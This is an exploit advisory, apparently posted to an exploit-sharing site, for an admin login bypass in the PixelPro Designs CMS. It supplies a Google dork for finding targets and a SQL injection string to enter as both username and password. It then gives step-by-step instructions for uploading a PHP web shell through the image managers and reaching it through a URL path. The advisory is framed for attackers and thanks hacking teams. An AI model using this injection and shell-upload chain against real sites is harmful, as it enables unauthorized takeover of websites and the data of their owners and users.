facebook facebook twitter rss

PixelPro admin login bypass (CMS)

Author: KatroX , Published: 22-08-2014
###################################################################
# Exploit Title: PixelPro admin login bypass (CMS)
# Google Dork: intext:"Developed By: PixelPro Designs"
# Date: 04-08-2014
# Exploit Author: KatroX
# Vendor Homepage: http://www.pixelprodesigns.com/
# Tested on: Windows 7 - Mozilla
####################################################################

####################################################################

# Description #
PixelPro Admin Login Bypass (CMS)

####################################################################

# POC #
#Location: http://target.com/admin/
#Username: ' or 1=1 limit 1 -- -+
#Password: ' or 1=1 limit 1 -- -+

####################################################################

# Shell Upload #
# You can go to :
# 1- Manage Property Image
# 2- Manage Gallery
# 3- Manage Logo
# and Upload your shell ( PHP allowed )

####################################################################

# Shell Access #
# Right clik in your shell uploaded and choose copy image location
# Example : target.com/admin/makeThumbnail.php?file=../images/propertyimage/20140803035408-YOUR-SHELL.php&w=100&h=80
# Edit the URL become : target.com/images/propertyimage/20140803035408-YOUR-SHELL.php

####################################################################

# THANKS TO #
# Indonesian Fighter Cyber Familly
# IDCA
# SOA
# and All Indonesian Cyber Team's
# Exploit4Arab Team
####################################################################

Like us on Facebook :